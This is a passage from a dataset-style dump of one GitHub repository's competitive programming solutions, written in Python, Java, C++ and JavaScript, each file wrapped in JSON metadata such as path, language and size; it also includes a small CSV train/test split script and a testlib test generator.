[n] = readln()\n a = readln()\n ans = 0\n for i in range(n - 1):\n mn = a[i]\n index = i\n for j in range(i, n):\n if a[j] < mn:\n mn = a[j]\n index = j\n ans += index - i + 1\n a[i:index + 1] = reversed(a[i:index + 1])\n\n return ans\n\n\n[t] = readln()\nfor q in range(1, t + 1):\n print(f'Case #{q}: {run()}')\n" }, { "alpha_fraction": 0.43566879630088806, "alphanum_fraction": 0.4484076499938965, "avg_line_length": 30.31999969482422, "blob_id": "7fed3f327cabec96a5c678b36fe36335695e7d47", "content_id": "618d74f54127dc9612659c59ec806b35ae93979a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 785, "license_type": "no_license", "max_line_length": 63, "num_lines": 25, "path": "/2021/vkcupMl/split.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import math\nimport csv\nfrom tqdm import tqdm\n\nccc = 'train.csv'\ntest = 'testSmall.csv'\ntrain = 'trainSmall.csv'\ntestTime = 10\n\nwith open(ccc, 'r') as csvFile:\n reader = csv.DictReader(csvFile)\n with open(test, 'w') as testFile:\n with open(train, 'w') as trainFile:\n trainFile.write('u,v,t,h\\n')\n testFile.write('u,v\\n')\n for row in tqdm(reader):\n u = int(row['u'])\n v = int(row['v'])\n t = [int(row['t']), int(row['h'])]\n if t[0] < testTime:\n if u % 8 == 1 and v % 2 != 0 and u < v:\n testFile.write(f'{u},{v}\\n')\n else:\n t[0] -= testTime\n trainFile.write(f'{u},{v},{t[0]},{t[1]}\\n')\n\n\n" }, { "alpha_fraction": 0.36008939146995544, "alphanum_fraction": 0.36748024821281433, "avg_line_length": 22.761701583862305, "blob_id": "73db752e49408f851b5d47977a569858f3817891", "content_id": "1119ef386434e1b3adae01a76086591d666560a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 7774, "license_type": "no_license", "max_line_length": 89, "num_lines": 235, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.13/J.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\r\nimport java.util.Map.Entry;\r\nimport java.io.*;\r\n \r\npublic class J {\r\n    FastScanner in;\r\n    PrintWriter out;\r\n \r\n    final String inputName = null;\r\n    final String outputName = null;\r\n \r\n    class Angle {\r\n        long x, y;\r\n \r\n        public Angle(long x, long y) {\r\n            if (y < 0) {\r\n                y *= -1;\r\n                x *= -1;\r\n            }\r\n \r\n            if (y == 0) {\r\n                x = 1;\r\n            }\r\n \r\n            if (x == 0) {\r\n                y = 1;\r\n            }\r\n \r\n            long g = gcd(Math.abs(x), Math.abs(y));\r\n \r\n            this.x = x / g;\r\n            this.y = y / g;\r\n        }\r\n \r\n        @Override\r\n        public int hashCode() {\r\n            return (int) (x * 1235321 + y);\r\n        }\r\n \r\n        @Override\r\n        public String toString() {\r\n            return \"Angle [dx=\" + x + \", dy=\" + y + \"]\";\r\n        }\r\n \r\n        @Override\r\n        public boolean equals(Object obj) {\r\n            if (this == obj)\r\n                return true;\r\n            if (obj == null)\r\n                return false;\r\n            Angle angle = (Angle) obj;\r\n            return x == angle.x && y == angle.y;\r\n        }\r\n    }\r\n \r\n    class Line implements Comparable<Line> {\r\n        long ax, ay, bx, by;\r\n \r\n        public Line(int ax, int ay, int bx, int by) {\r\n            this.ax = ax;\r\n            this.ay = ay;\r\n            this.bx = bx;\r\n            this.by = by;\r\n        }\r\n \r\n        Angle angle() {\r\n            return new Angle(ax - bx, ay - by);\r\n        }\r\n \r\n        public int compareTo(Line v) {\r\n            Line u = this;\r\n \r\n            if (u.ax == u.bx) {\r\n                return Long.compare(u.ax, v.ax);\r\n            }\r\n \r\n            long p = (u.ax * (u.by - u.ay) + u.ay * (u.ax - u.bx)) * (v.ax - v.bx);\r\n            long q = (v.ax * (v.by - v.ay) + v.ay * (v.ax - v.bx)) * (u.ax - u.bx);\r\n \r\n            return Long.compare(p, q);\r\n        }\r\n \r\n        @Override\r\n        public String toString() {\r\n            return \"Line [ax=\" + ax + \", ay=\" + ay + \", bx=\" + bx + \", by=\" + by + \"]\";\r\n        }\r\n \r\n    }\r\n \r\n    long gcd(long a, long b) {\r\n        return b == 0 ? a : gcd(b, a % b);\r\n    }\r\n \r\n    public void solve() {\r\n \r\n        long mod = 1_000_000_007;\r\n        long inv = 500000004;\r\n \r\n        int n = in.nextInt();\r\n \r\n        Map<Angle, List<Line>> q = new HashMap<>(n + 23);\r\n \r\n        for (int i = 0; i < n; i++) {\r\n            Line line = new Line(in.nextInt(), in.nextInt(), in.nextInt(), in.nextInt());\r\n            Angle key = line.angle();\r\n \r\n            List<Line> list = q.get(key);\r\n \r\n            if (list == null) {\r\n                list = new ArrayList<Line>();\r\n                q.put(key, list);\r\n            }\r\n \r\n            list.add(line);\r\n        }\r\n \r\n        Map<Angle, Long> w = new HashMap<>(n + 23);\r\n \r\n        for (Entry<Angle, List<Line>> e : q.entrySet()) {\r\n            Angle angle = e.getKey();\r\n            List<Line> list = e.getValue();\r\n \r\n            // out.println(angle);\r\n            //\r\n            // for (Line line : list) {\r\n            // out.println(\"     \" + line);\r\n            // }\r\n            Collections.sort(list);\r\n            // out.println(\"sorted\");\r\n            // for (Line line : list) {\r\n            // out.println(\"     \" + line);\r\n            // }\r\n \r\n            long cnt = 0;\r\n \r\n            int m = list.size();\r\n \r\n            int l = 0;\r\n \r\n            while (l < m) {\r\n                int r = l;\r\n                while (r < m && list.get(l).compareTo(list.get(r)) == 0) {\r\n                    ++r;\r\n                }\r\n                long len = m - r;\r\n                cnt = (cnt + ((r - l) * len) % mod) % mod;\r\n                l = r;\r\n            }\r\n            w.put(angle, cnt);\r\n        }\r\n \r\n        long ans = 0;\r\n \r\n        for (Entry<Angle, Long> e : w.entrySet()) {\r\n            Angle angle = e.getKey();\r\n            long u = e.getValue();\r\n \r\n            Angle ort = new Angle(-angle.y, angle.x);\r\n \r\n            Long v = w.get(ort);\r\n \r\n            if (v != null) {\r\n                ans = (ans + (u * v) % mod) % mod;\r\n            }\r\n \r\n        }\r\n \r\n        out.println((ans * inv) % mod);\r\n \r\n    }\r\n \r\n    public void run() {\r\n        try {\r\n \r\n            if (inputName == null) {\r\n                in = new FastScanner(null);\r\n            } else {\r\n                in = new FastScanner(new File(inputName));\r\n            }\r\n \r\n            if (outputName == null) {\r\n                out = new PrintWriter(System.out);\r\n            } else {\r\n                out = new PrintWriter(new File(outputName));\r\n \r\n            }\r\n \r\n            solve();\r\n \r\n            out.close();\r\n        } catch (IOException e) {\r\n            e.printStackTrace();\r\n        }\r\n    }\r\n \r\n    class FastScanner {\r\n        BufferedReader br;\r\n        StringTokenizer st;\r\n \r\n        FastScanner(File f) {\r\n            try {\r\n                if (f == null) {\r\n                    br = new BufferedReader(new InputStreamReader(System.in));\r\n                } else {\r\n                    br = new BufferedReader(new FileReader(f));\r\n                }\r\n            } catch (FileNotFoundException e) {\r\n                e.printStackTrace();\r\n            }\r\n        }\r\n \r\n        long nextLong() {\r\n            return Long.parseLong(next());\r\n        }\r\n \r\n        String next() {\r\n            while (st == null || !st.hasMoreTokens()) {\r\n                try {\r\n                    st = new StringTokenizer(br.readLine());\r\n                } catch (IOException e) {\r\n                    e.printStackTrace();\r\n                }\r\n            }\r\n            return st.nextToken();\r\n        }\r\n \r\n        int nextInt() {\r\n            return Integer.parseInt(next());\r\n        }\r\n    }\r\n \r\n    public static void main(String[] arg) {\r\n        new J().run();\r\n    }\r\n}\n" }, { "alpha_fraction": 0.26288658380508423, "alphanum_fraction": 0.27577319741249084, "avg_line_length": 26.012659072875977, "blob_id": "57e4b626f0384e617edcb393ca22f79606c46dd1", "content_id": "433734de8d57e704b29bd54a034e0ef01fc5582a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4268, "license_type": "no_license", "max_line_length": 80, "num_lines": 158, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.29/H.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\nimport java.util.*;\n\npublic class H {\n\n final static String task_name = \"stdin\";\n\n void run() throws IOException {\n int h = nextInt();\n char[] q = next().toCharArray();\n int m = q.length + 1;\n int[] ans = new int[m];\n int l = 1;\n int d = 0;\n\n for (int i = 1, c = 1; i < m; i++) {\n if (q[i - 1] == '>') {\n if (d == -1) {\n ++c;\n } else {\n c = 2;\n d = -1;\n }\n } else if (q[i - 1] == '<') {\n if (d == 1) {\n ++c;\n } else {\n c = 2;\n d = 1;\n }\n }\n if (c > l) {\n l = c;\n }\n }\n\n if (l > h) {\n pw.println(-1);\n return;\n }\n\n d = 0;\n for (int i = 1; i < m && d == 0; i++) {\n if (q[i - 1] == '>') {\n d = -1;\n } else if (q[i - 1] == '<') {\n d = 1;\n }\n\n }\n\n if (d == 0) {\n Arrays.fill(ans, 1);\n } else {\n ans[0] = (d == 1) ? 1 : l;\n int x = 1;\n while (x < m) {\n int y, z;\n for (y = x; y < m; y++) {\n if (d == 1 && q[y - 1] == '>') {\n break;\n }\n if (d == -1 && q[y - 1] == '<') {\n break;\n }\n }\n\n --y;\n\n for (z = x; z <= y; z++) {\n if (q[z - 1] != '=') {\n break;\n }\n }\n\n //pw.println(d + \" \" + x + \" \" + z + \" \" + y);\n\n if (d == 1) {\n ans[y] = l;\n for (int i = y - 1; i >= z; i--) {\n if (q[i] != '=') {\n ans[i] = ans[i + 1] - 1;\n } else {\n ans[i] = ans[i + 1];\n }\n }\n for (int i = x; i < z; i++) {\n if (q[i - 1] != '=') {\n ans[i] = ans[i - 1] + 1;\n } else {\n ans[i] = ans[i - 1];\n }\n }\n\n d = -1;\n } else {\n\n ans[y] = 1;\n for (int i = y - 1; i >= z; i--) {\n if (q[i] != '=') {\n ans[i] = ans[i + 1] + 1;\n } else {\n ans[i] = ans[i + 1];\n }\n }\n for (int i = x; i < z; i++) {\n if (q[i - 1] != '=') {\n ans[i] = ans[i - 1] - 1;\n } else {\n ans[i] = ans[i - 1];\n }\n }\n\n d = 1;\n }\n\n x = y + 1;\n }\n\n }\n\n for (int a : ans) {\n pw.print((char) (a + 96));\n }\n\n }\n\n String next() throws IOException {\n while (st == null || !st.hasMoreTokens())\n st = new StringTokenizer(br.readLine());\n return st.nextToken();\n }\n\n int nextInt() throws IOException {\n return Integer.parseInt(next());\n }\n\n String nextLine() throws IOException {\n return br.readLine();\n }\n\n static PrintWriter pw;\n static BufferedReader br;\n static StringTokenizer st;\n\n public static void main(String[] args) throws IOException {\n long timeout = System.currentTimeMillis();\n // br = new BufferedReader(new FileReader(new File(task_name + \".in\")));\n // pw = new PrintWriter(new FileWriter(new File(task_name + \".out\")));\n // while (br.ready())\n br = new BufferedReader(new InputStreamReader(System.in));\n pw = new PrintWriter(System.out);\n new H().run();\n // System.out.println(System.currentTimeMillis() - timeout);\n br.close();\n pw.close();\n }\n}\n" }, { "alpha_fraction": 0.3640483319759369, "alphanum_fraction": 0.40785497426986694, "avg_line_length": 21.066667556762695, "blob_id": "bec07be1bd4344dd781ad5bdfe4b2774737a1a3d", "content_id": "ca3994b24c423ca67edb301e30f46c8f7c5f7927", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 662, "license_type": "no_license", "max_line_length": 77, "num_lines": 30, "path": "/2017/newYear/I.js", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "var count = Number(readline());\nvar a = {};\nvar minutes = 0;\nvar hours = 12;\n\nfunction good(h, m) {\n var s = \"\" + h + \"\" + (m >= 10 ? m : (\"0\" + m));\n var d = s[0] - s[1];\n for (var j = 1; j < s.length - 1; ++j)\n if (s[j] - s[j + 1] != d)\n return 0;\n// print(s, h, m)\n return 1;\n}\n\nvar i = 0;\nfor (; i === 0 || minutes !== 0 || hours !== 12; ++i) {\n a[i] = i === 0 ? 0 : a[i - 1] + good(hours, minutes);\n \n minutes++;\n if (minutes == 60) {\n minutes = 0;\n hours++;\n }\n if (hours == 13)\n hours = 1;\n}\n\nvar ans = a[i - 1] * (count >= i ? Math.floor(count / i) : 0) + a[count % i];\nprint(ans);\n" }, { "alpha_fraction": 0.5185185074806213, "alphanum_fraction": 0.5185185074806213, "avg_line_length": 22.14285659790039, "blob_id": "fc10f4e46df62ef172b0d3104e6d691aeb8e2132", "content_id": "f4083996274b72de8627a7cb23cd61a597dc0c4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 162, "license_type": "no_license", "max_line_length": 42, "num_lines": 7, "path": "/trash/files.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "f = open('in', 'r')\ng = open('out', 'w')\nw = [int(x) for x in f.readline().split()]\nw.reverse()\nfor x in w:\n g.write(str(x) + ' ')\n#g.write(str(x) for x in w)\n" }, { "alpha_fraction": 0.48574298620224, "alphanum_fraction": 0.5084337592124939, "avg_line_length": 31.54901885986328, "blob_id": "460c1252a7a49af8b573dde762438369cc6eb7fc", "content_id": "286faf7d7673371ef9d928bd149afebccf04ff94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4980, "license_type": "no_license", "max_line_length": 174, "num_lines": 153, "path": "/CodeForce/1427/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//printTuple\ntemplate<class Tuple, size_t... Is> ostream& print_tuple(ostream& os, const Tuple& t, index_sequence<Is...>) { ((os << (Is == 0 ? \"\" : \" \") << get<Is>(t)), ...); return os; }\ntemplate<class Tuple, size_t... Is> istream& read_tuple(istream& is, Tuple& t, index_sequence<Is...>) { ((is >> get<Is>(t)), ...); return is; }\ntemplate<class... Args> inline ostream& operator<<(ostream& os, const tuple<Args...>& t) { return print_tuple(os, t, index_sequence_for<Args...>{}); }\ntemplate<class... Args> inline istream& operator>>(istream& is, tuple<Args...>& t) { return read_tuple(is, t, index_sequence_for<Args...>{}); }\n\n//}}}\ntemplate<typename T = ll>\nT extendedGcd(const T& a, const T& b, T& x, T& y)\n{\n\tif (a == 0)\n {\n\t\tx = 0;\n y = 1;\n\t\treturn b;\n\t}\n\tT x1, y1;\n\tT d = extendedGcd(b % a, a, x1, y1);\n\tx = y1 - (b / a) * x1;\n\ty = x1;\n\treturn d;\n}\n\ntemplate<typename T = ll>\nbool diofant(const T& a, const T& b, const T& c, T& x0, T& y0, T& g)\n{\n\tg = extendedGcd(abs(a), abs(b), x0, y0);\n\tif (c % g != 0)\n\t\treturn false;\n\tx0 *= c / g;\n\ty0 *= c / g;\n\tif (a < 0) x0 *= -1;\n\tif (b < 0) y0 *= -1;\n\treturn true;\n}\n\n\nvoid run()\n{\n mt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n ints(n);\n set<ll> s = {n};\n vector<ll> a = {n};\n vector<tuple<ll, char, ll>> actions;\n fori(90000)\n {\n ll x = a[rng() % a.size()];\n ll y = a[rng() % a.size()];\n int action = rng() % 2;\n ll z = action ? (x + y) : (x ^ y);\n if (s.find(z) != s.end())\n continue;\n else\n {\n s.insert(z);\n a.pb(z);\n actions.emplace_back(x, action ? '+' : '^', y);\n }\n }\n\n auto binMul = [&](ll a, ll n)\n {\n a = abs(a);\n n = abs(n);\n ll res = a; --n;\n while (n > 0)\n {\n if (n & 1)\n {\n actions.emplace_back(res, '+', a);\n res += a;\n }\n actions.emplace_back(a, '+', a);\n a += a;\n n >>= 1;\n }\n return res;\n };\n\n ll x0, y0, g;\n fori(a.size())\n FOR(j, i + 1, a.size())\n if (diofant(a[i], a[j], 1ll, x0, y0, g) && g == 1)\n {\n ll temp = abs(a[i] * 1ll * x0);\n ll temp2 = abs(a[j] * 1ll * y0);\n ll e = min(temp, temp2);\n ll r = max(temp, temp2);\n if (e % 2 == 0 && r == e + 1)\n {\n ll q = binMul(a[i], x0);\n ll w = binMul(a[j], y0);\n actions.emplace_back(q, '^', w);\n writeln(actions.size());\n writeln(actions);\n return;\n }\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5208333134651184, "alphanum_fraction": 0.5208333134651184, "avg_line_length": 19.571428298950195, "blob_id": "dbb35ed16afe7473917d224890a047a784b55aa2", "content_id": "8dbb17fe7916f84ca69cb6454f369b1206e4eefe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 144, "license_type": "no_license", "max_line_length": 56, "num_lines": 7, "path": "/CodeForce/1800/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\n\nt = int(input())\nfor i in range(t):\n n = input()\n s = input().lower()\n print('YES' if re.match(r'^m+e+o+w+$', s) else 'NO')\n" }, { "alpha_fraction": 0.4552549421787262, "alphanum_fraction": 0.46930280327796936, "avg_line_length": 29.507936477661133, "blob_id": "cb26708a9882ff67538fe391b67deb3a171d7402", "content_id": "b604f32b89481db527704c4934d35fd4b3a28a0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1922, "license_type": "no_license", "max_line_length": 928, "num_lines": 63, "path": "/CodeForce/0320/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n //freopen(\"input.txt\", \"r\", stdin);\n string s;\n cin >> s;\n s += '1';\n int j = 0;\n if (s[0] == '4')\n {\n printf(\"NO\\n\");\n return 0;\n\n }\n for (int i = 0; i < s.length(); i++)\n if (s[i] != '1' && s[i] != '4')\n {\n printf(\"NO\\n\");\n return 0;\n\n } else\n {\n if (s[i] == '4')\n j++; else{\n if (j > 2)\n {\n\n printf(\"NO\\n\");\n return 0;\n } else j = 0;\n }\n }\n printf(\"YES\");\n return 0;\n}\n" }, { "alpha_fraction": 0.39240506291389465, "alphanum_fraction": 0.4430379867553711, "avg_line_length": 14.600000381469727, "blob_id": "2db28bd8cc2fae7bcef31721ac8e332d82c14a47", "content_id": "494afa8d9a7296711e8bf0fe75f12e2f3d49436d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 79, "license_type": "no_license", "max_line_length": 20, "num_lines": 5, "path": "/2015/snws1/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\nc = 0.0\nfor i in range(n):\n c += 1 / (i + 1)\nprint(c * n)\n\n" }, { "alpha_fraction": 0.4653172194957733, "alphanum_fraction": 0.491483598947525, "avg_line_length": 35.4954948425293, "blob_id": "231177ceece0a0e85f46c37b95fb4dbc550b1fbd", "content_id": "7564d0d2af8daa0d13df3aaa4adab6cea6489213", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4051, "license_type": "no_license", "max_line_length": 174, "num_lines": 111, "path": "/CodeForce/gym/360425/G.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n, k);\n vector<array<int, 4>> a(n), b(n);\n fori(n)\n readln(a[i][0], a[i][1], a[i][2]),\n a[i][3] = i,\n b[i][3] = i,\n b[i][1] = a[i][0],\n b[i][0] = a[i][1],\n b[i][2] = a[i][2];\n set<array<int, 4>> s(all(a));\n set<array<int, 4>> t(all(b));\n vector<int> ans(n, -1);\n vector<int> comps;\n fori(n)\n if (ans[i] == -1)\n {\n vector<int> c;\n int mn = MOD;\n function<void(int)> dfs = [&](int u) {\n mn = min(mn, a[u][2]);\n ans[u] = 1;\n s.erase(a[u]);\n t.erase(b[u]);\n auto right = s.lower_bound(a[u]);\n if (right != s.end())\n if ((*right)[0] == a[u][0] && (*right)[1] - a[u][1] <= k)\n dfs((*right)[3]);\n auto left = s.lower_bound({a[u][0], a[u][1] - k, 0, 0});\n if (left != s.end())\n if ((*left)[0] == a[u][0] && (*left)[1] < a[u][1])\n dfs((*left)[3]);\n\n auto up = t.lower_bound(b[u]);\n if (up != t.end())\n if ((*up)[0] == b[u][0] && (*up)[1] - b[u][1] <= k)\n dfs((*up)[3]);\n auto down = t.lower_bound({b[u][0], b[u][1] - k, 0, 0});\n if (down != t.end())\n if ((*down)[0] == b[u][0] && (*down)[1] < b[u][1])\n dfs((*down)[3]);\n };\n dfs(i);\n comps.pb(mn);\n }\n sort(all(comps));\n reverse(all(comps));\n fori(comps.size())\n if (i + 1 == comps.size() || comps[i + 1] <= i)\n return writeln(i);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.45783132314682007, "alphanum_fraction": 0.5086058378219604, "avg_line_length": 21.784313201904297, "blob_id": "3f8d70187ea4b02f15227ac71fad3aadeec9f5d9", "content_id": "0f5f75c966b596343d62d6bd3066d1e8d3c5255e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1162, "license_type": "no_license", "max_line_length": 53, "num_lines": 51, "path": "/scripts/A+B/genA+B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <testlib.h>\n#include <writeln.h>\n#include <bits/stdc++.h>\n\nusing namespace std;\n\nint counter = 0;\n\nvoid printTest(string_view first, string_view second)\n{\n startTest(++counter);\n writeln(first, second);\n}\n\nvoid all(string first, string second)\n{\n printTest(first, second);\n printTest(\"-\" + first, second);\n printTest(first, \"-\" + second);\n printTest(\"-\" + first, \"-\" + second);\n}\n\nint main(int argc, char* argv[])\n{\n registerGen(argc, argv, 1);\n string first = \"1\";\n string second = \"1\";\n all(first, second);\n for (int i = 0; i < 30; i += 2)\n second += \"00\",\n all(second, first),\n all(first, second);\n for (int i = 0; i < 10; ++i)\n {\n first = rnd.next(\"[1-9][0-9]{99}\");\n second = rnd.next(\"[1-9][0-9]{99}\");\n all(first, second);\n }\n for (int i = 0; i < 10; ++i)\n {\n first = rnd.next(\"[1-9][0-9]{99}\");\n second = rnd.next(\"[1-9][0-9]{10}\");\n all(first, second);\n }\n for (int i = 0; i < 10; ++i)\n {\n first = rnd.next(\"[1-9][0-9]{1000}\");\n second = rnd.next(\"[1-9][0-9]{1000}\");\n printTest(first, second);\n }\n}\n" }, { "alpha_fraction": 0.2841007709503174, "alphanum_fraction": 0.2971329391002655, "avg_line_length": 21.153846740722656, "blob_id": "6d9873d0cc2170dc9f861ae74c7bf7348f78ef3c", "content_id": "7f0fd31faf373ba25f7173d8668400c1699404db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1151, "license_type": "no_license", "max_line_length": 58, "num_lines": 52, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.25/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n \n#define fori(n) for (int i = 0; i < n; ++i)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n \n#define fst first\n#define snd second\n#define pb push_back\n \nusing namespace std;\n \nint main()\n{\n //freopen(\"in.c\", \"r\", stdin);\n int n;\n while (true)\n {\n cin >> n;\n if (n == 0)\n return 0;\n string s;\n int m;\n int count = 0, ans = 0;\n fori(n)\n {\n cin >> s >> m;\n if (s[0] == 'D')\n {\n count += m;\n cout << \"DROP 2 \" << m << \"\\n\";\n }\n else\n {\n int c = min(m, ans);\n if (ans)\n cout << \"TAKE 1 \" << c << \"\\n\";\n m -= c;\n ans -= c;\n if (m)\n {\n cout << \"MOVE 2->1 \" << count << \"\\n\";\n ans += count;\n count = 0;\n cout << \"TAKE 1 \" << m << \"\\n\";\n ans -= m;\n }\n }\n }\n cout << \"\\n\";\n 